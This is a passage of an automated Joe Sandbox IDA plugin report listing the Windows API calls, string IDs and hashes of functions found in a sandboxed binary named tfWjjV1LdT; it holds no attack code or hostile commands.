                                                            • API String ID: 3096461208-0
                                                            • Opcode ID: fc018c03024da631007c06adea59d6b031a73864599245e404b87bdd24644443
                                                            • Instruction ID: dd217951fd9fda2ed7ecd869cbbed9f830772093d07099ad16166065e04884dd
                                                            • Opcode Fuzzy Hash: fc018c03024da631007c06adea59d6b031a73864599245e404b87bdd24644443
                                                            • Instruction Fuzzy Hash: 0E512B71B00205AFDB18CFADDD99AAEBBBAEB88710F14C129F615E62D0D7709D018B14
                                                            APIs
                                                              • Part of subcall function 00691B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00692036,?,00000000,?,?,?,?,006916CB,00000000,?), ref: 00691B9A
                                                            • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 006920D3
                                                            • KillTimer.USER32(-00000001,?,?,?,?,006916CB,00000000,?,?,00691AE2,?,?), ref: 0069216E
                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 006CBCA6
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006916CB,00000000,?,?,00691AE2,?,?), ref: 006CBCD7
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006916CB,00000000,?,?,00691AE2,?,?), ref: 006CBCEE
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006916CB,00000000,?,?,00691AE2,?,?), ref: 006CBD0A
                                                            • DeleteObject.GDI32(00000000), ref: 006CBD1C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                            • String ID:
                                                            • API String ID: 641708696-0
                                                            • Opcode ID: fb98cadc1529432d090e9439ee8f57e1fd2ae742adde55f708a56518140607e3
                                                            • Instruction ID: f2be9817a5b49986d2e6bbc09c76d239601eb060031ccbbe7aceb4b961a7c309
                                                            • Opcode Fuzzy Hash: fb98cadc1529432d090e9439ee8f57e1fd2ae742adde55f708a56518140607e3
                                                            • Instruction Fuzzy Hash: 95618C30500B02EFCB259F18D969BA977F7FF44312F50842CE5428AAA0C7B8B891DB94
                                                            APIs
                                                              • Part of subcall function 006925DB: GetWindowLongW.USER32(?,000000EB), ref: 006925EC
                                                            • GetSysColor.USER32(0000000F), ref: 006921D3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ColorLongWindow
                                                            • String ID:
                                                            • API String ID: 259745315-0
                                                            • Opcode ID: 85277a3c6aa5baaf37230dee4cb5db30639d9337b3307643849a50246ef1b6c1
                                                            • Instruction ID: 142133476a9a4ffc5b1d4bbb5fc6393a9f1b66d1448f1e96d4da80591c6e75a6
                                                            • Opcode Fuzzy Hash: 85277a3c6aa5baaf37230dee4cb5db30639d9337b3307643849a50246ef1b6c1
                                                            • Instruction Fuzzy Hash: F341D030004541FADF255F28ECA8BF93B6BEB06331F248265FE658A2E1C7318D42DB21
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?,0071F910), ref: 006FA90B
                                                            • GetDriveTypeW.KERNEL32(00000061,007489A0,00000061), ref: 006FA9D5
                                                            • _wcscpy.LIBCMT ref: 006FA9FF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: BuffCharDriveLowerType_wcscpy
                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                            • API String ID: 2820617543-1000479233
                                                            • Opcode ID: a67cac32ba855513a49861811af6cfac43051e6b31bb5a2feba0cfdb23323e54
                                                            • Instruction ID: bb402f14430789ddad754e6db06a5fcb265fa9e08acc8ed096e5200b0bb6d336
                                                            • Opcode Fuzzy Hash: a67cac32ba855513a49861811af6cfac43051e6b31bb5a2feba0cfdb23323e54
                                                            • Instruction Fuzzy Hash: C6519EB1128305AFC740EF54C992ABFB7AAFF85340F10482DF599572A2DB719909CB53
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: __i64tow__itow__swprintf
                                                            • String ID: %.15g$0x%p$False$True
                                                            • API String ID: 421087845-2263619337
                                                            • Opcode ID: 6ab0f3bcd63557ad8530c810a08a59f8f9efdd5cf4657ad0ebc180c7a65170f6
                                                            • Instruction ID: bff3435b1d5670fd9f22b7a941af073e270976984c490e5e0e8fc37b35de59b6
                                                            • Opcode Fuzzy Hash: 6ab0f3bcd63557ad8530c810a08a59f8f9efdd5cf4657ad0ebc180c7a65170f6
                                                            • Instruction Fuzzy Hash: 6241B8B1610205AEEF64DF38D941EBA77EFEF05300F64486EE549D7392EA319942CB21
                                                            APIs
                                                            • _memset.LIBCMT ref: 0071716A
                                                            • CreateMenu.USER32 ref: 00717185
                                                            • SetMenu.USER32(?,00000000), ref: 00717194
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00717221
                                                            • IsMenu.USER32(?), ref: 00717237
                                                            • CreatePopupMenu.USER32 ref: 00717241
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0071726E
                                                            • DrawMenuBar.USER32 ref: 00717276
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                            • String ID: 0$F
                                                            • API String ID: 176399719-3044882817
                                                            • Opcode ID: 32ad6066feb77fd308cdd351c22c074117d900b6d96bf3714f3fc749b7cefb4d
                                                            • Instruction ID: e641dd38633b1ecfd0c715552510ba820ca9b892686e13feed1fa56691e25446
                                                            • Opcode Fuzzy Hash: 32ad6066feb77fd308cdd351c22c074117d900b6d96bf3714f3fc749b7cefb4d
                                                            • Instruction Fuzzy Hash: 82414974A01209EFDB24DF68D845EDA7BF6FF48310F148029F905973A1D779A960CB94
                                                            APIs
                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0071755E
                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00717565
                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00717578
                                                            • SelectObject.GDI32(00000000,00000000), ref: 00717580
                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0071758B
                                                            • DeleteDC.GDI32(00000000), ref: 00717594
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0071759E
                                                            • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 007175B2
                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 007175BE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                            • String ID: static
                                                            • API String ID: 2559357485-2160076837
                                                            • Opcode ID: dd043f786c1b513df596a367c92162419c2ac1e6865cdd0fdfb6ec8db466f18e
                                                            • Instruction ID: 566cf39b2384f6bb3cf0b3c55f6659be758d3a988b89116d7933eee7cc1efe08
                                                            • Opcode Fuzzy Hash: dd043f786c1b513df596a367c92162419c2ac1e6865cdd0fdfb6ec8db466f18e
                                                            • Instruction Fuzzy Hash: 25316D72104219BBDF159F68DC09FDA3B7AFF09360F118224FA15A61E0C739D961DBA8
                                                            APIs
                                                            • _memset.LIBCMT ref: 006B6E3E
                                                              • Part of subcall function 006B8B28: __getptd_noexit.LIBCMT ref: 006B8B28
                                                            • __gmtime64_s.LIBCMT ref: 006B6ED7
                                                            • __gmtime64_s.LIBCMT ref: 006B6F0D
                                                            • __gmtime64_s.LIBCMT ref: 006B6F2A
                                                            • __allrem.LIBCMT ref: 006B6F80
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006B6F9C
                                                            • __allrem.LIBCMT ref: 006B6FB3
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006B6FD1
                                                            • __allrem.LIBCMT ref: 006B6FE8
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006B7006
                                                            • __invoke_watson.LIBCMT ref: 006B7077
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                            • String ID:
                                                            • API String ID: 384356119-0
                                                            • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                            • Instruction ID: df8dda4ae46ba3b49e28513ec6986ad9155f9991bc3fd1bc9c6a1ca70224fafc
                                                            • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                            • Instruction Fuzzy Hash: F071F5F6A00716ABD714EE68DC41BEAB3BAEF44324F10812EF514D7381E774DA818B94
                                                            APIs
                                                            • _memset.LIBCMT ref: 006F2542
                                                            • GetMenuItemInfoW.USER32(00755890,000000FF,00000000,00000030), ref: 006F25A3
                                                            • SetMenuItemInfoW.USER32(00755890,00000004,00000000,00000030), ref: 006F25D9
                                                            • Sleep.KERNEL32(000001F4), ref: 006F25EB
                                                            • GetMenuItemCount.USER32(?), ref: 006F262F
                                                            • GetMenuItemID.USER32(?,00000000), ref: 006F264B
                                                            • GetMenuItemID.USER32(?,-00000001), ref: 006F2675
                                                            • GetMenuItemID.USER32(?,?), ref: 006F26BA
                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 006F2700
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006F2714
                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006F2735
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                            • String ID:
                                                            • API String ID: 4176008265-0
                                                            • Opcode ID: eb5e0f2ecfa076ab1e16ae395bf84ec627e218070c9c80b56c9262243d96506e
                                                            • Instruction ID: 6e28de34d9e42cdcd499b4e231fcf2baad3b78d19d468fb1d6600e328f2084a3
                                                            • Opcode Fuzzy Hash: eb5e0f2ecfa076ab1e16ae395bf84ec627e218070c9c80b56c9262243d96506e
                                                            • Instruction Fuzzy Hash: A9617CB090024EAFDB11DFA8CCA89FEBBBAFB01304F144059EA41A7291D735AD15DF25
                                                            APIs
                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00716FA5
                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00716FA8
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00716FCC
                                                            • _memset.LIBCMT ref: 00716FDD
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00716FEF
                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00717067
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$LongWindow_memset
                                                            • String ID:
                                                            • API String ID: 830647256-0
                                                            • Opcode ID: 68c33e043ba4969f096cc57fa81cc9cee153c561d4c6871deb23088e7e40bff6
                                                            • Instruction ID: 6f3d744ba823046c87df4ee8a890a18beb710101778fbe241889e46297a154d3
                                                            • Opcode Fuzzy Hash: 68c33e043ba4969f096cc57fa81cc9cee153c561d4c6871deb23088e7e40bff6
                                                            • Instruction Fuzzy Hash: 5E617B75900208AFDB10DFA8CC81EEE77F8EB09710F104159FA14AB2E1C779AD85DBA4
                                                            APIs
                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 006E6BBF
                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 006E6C18
                                                            • VariantInit.OLEAUT32(?), ref: 006E6C2A
                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 006E6C4A
                                                            • VariantCopy.OLEAUT32(?,?), ref: 006E6C9D
                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 006E6CB1
                                                            • VariantClear.OLEAUT32(?), ref: 006E6CC6
                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 006E6CD3
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006E6CDC
                                                            • VariantClear.OLEAUT32(?), ref: 006E6CEE
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006E6CF9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                            • String ID:
                                                            • API String ID: 2706829360-0
                                                            • Opcode ID: 2c673698a52b7b5c22fd66c6dac6730e7d5ae9bb98d602c9ecb931a20aaa6690
                                                            • Instruction ID: 67d63fea610e9c100f7bac48783bccd49da7aa722375d7e90744daa44d9839b3
                                                            • Opcode Fuzzy Hash: 2c673698a52b7b5c22fd66c6dac6730e7d5ae9bb98d602c9ecb931a20aaa6690
                                                            • Instruction Fuzzy Hash: 81416D31A002599FCF00DFA9D8449EEBBBAEF18354F10C069F955A7261DB34A945CFA4
                                                            APIs
                                                            • WSAStartup.WSOCK32(00000101,?), ref: 00705793
                                                            • inet_addr.WSOCK32(?,?,?), ref: 007057D8
                                                            • gethostbyname.WSOCK32(?), ref: 007057E4
                                                            • IcmpCreateFile.IPHLPAPI ref: 007057F2
                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00705862
                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00705878
                                                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 007058ED
                                                            • WSACleanup.WSOCK32 ref: 007058F3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                            • String ID: Ping
                                                            • API String ID: 1028309954-2246546115
                                                            • Opcode ID: 89b226bb870102ad8bd9d9044c6fa9f1d8a5ed3211828d3e068c2b86099b8229
                                                            • Instruction ID: 8c466ea6518a57b0db040d812ed5d7fd950d4eeea280965c0cb3f158a62b8c54
                                                            • Opcode Fuzzy Hash: 89b226bb870102ad8bd9d9044c6fa9f1d8a5ed3211828d3e068c2b86099b8229
                                                            • Instruction Fuzzy Hash: AB516B31604700DFDB50EF29CC45B6A7BE5AB49720F048A29F956DB2E1DB38E800DF55
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 006FB4D0
                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 006FB546
                                                            • GetLastError.KERNEL32 ref: 006FB550
                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 006FB5BD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                            • API String ID: 4194297153-14809454
                                                            • Opcode ID: 502da1fc4f3eecf199d56b62983247d60007d1c132f9e37e10a42a8ab073e04b
                                                            • Instruction ID: 5ad116ff52a20ece41a31acd36e962aedd240240406a2473871abd5dc7fc9170
                                                            • Opcode Fuzzy Hash: 502da1fc4f3eecf199d56b62983247d60007d1c132f9e37e10a42a8ab073e04b
                                                            • Instruction Fuzzy Hash: 51318175A0020DEFDB40EF68C845AFD77BAFF05314F108129F60597291DB799A42CB55
                                                            APIs
                                                              • Part of subcall function 00697DE1: _memmove.LIBCMT ref: 00697E22
                                                              • Part of subcall function 006EAA99: GetClassNameW.USER32(?,?,000000FF), ref: 006EAABC
                                                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 006E9014
                                                            • GetDlgCtrlID.USER32 ref: 006E901F
                                                            • GetParent.USER32 ref: 006E903B
                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 006E903E
                                                            • GetDlgCtrlID.USER32(?), ref: 006E9047
                                                            • GetParent.USER32(?), ref: 006E9063
                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 006E9066
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 1536045017-1403004172
                                                            • Opcode ID: 4de8dc54c313ecb332077272e2cc899d19d2f84453f41ad793643bf2e2d5a59d
                                                            • Instruction ID: 23afc22c8be4d9089ef553fcdafa5b53c72aac53480ba32927a7aff4d8b621df
                                                            • Opcode Fuzzy Hash: 4de8dc54c313ecb332077272e2cc899d19d2f84453f41ad793643bf2e2d5a59d
                                                            • Instruction Fuzzy Hash: 1621D670A00348BBDF05ABA5CC85EFEBB7AEF49310F104119F921972E1DB795819DB24
                                                            APIs
                                                              • Part of subcall function 00697DE1: _memmove.LIBCMT ref: 00697E22
                                                              • Part of subcall function 006EAA99: GetClassNameW.USER32(?,?,000000FF), ref: 006EAABC
                                                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 006E90FD
                                                            • GetDlgCtrlID.USER32 ref: 006E9108
                                                            • GetParent.USER32 ref: 006E9124
                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 006E9127
                                                            • GetDlgCtrlID.USER32(?), ref: 006E9130
                                                            • GetParent.USER32(?), ref: 006E914C
                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 006E914F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 1536045017-1403004172
                                                            • Opcode ID: 4df2d299a884746e3f9984e421f47fe806c42f4e682e8dcff735ec47dd040f09
                                                            • Instruction ID: 32867e5520089961e0f993d72c993103674dfdca9c1ae60a428ba4debf3a90f8
                                                            • Opcode Fuzzy Hash: 4df2d299a884746e3f9984e421f47fe806c42f4e682e8dcff735ec47dd040f09
                                                            • Instruction Fuzzy Hash: 7A21C574A01348BBDF15ABA5CC85EFEBB7AEF48300F10801AF911972A1DB795819DB24
                                                            APIs
                                                            • GetParent.USER32 ref: 006E916F
                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 006E9184
                                                            • _wcscmp.LIBCMT ref: 006E9196
                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 006E9211
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
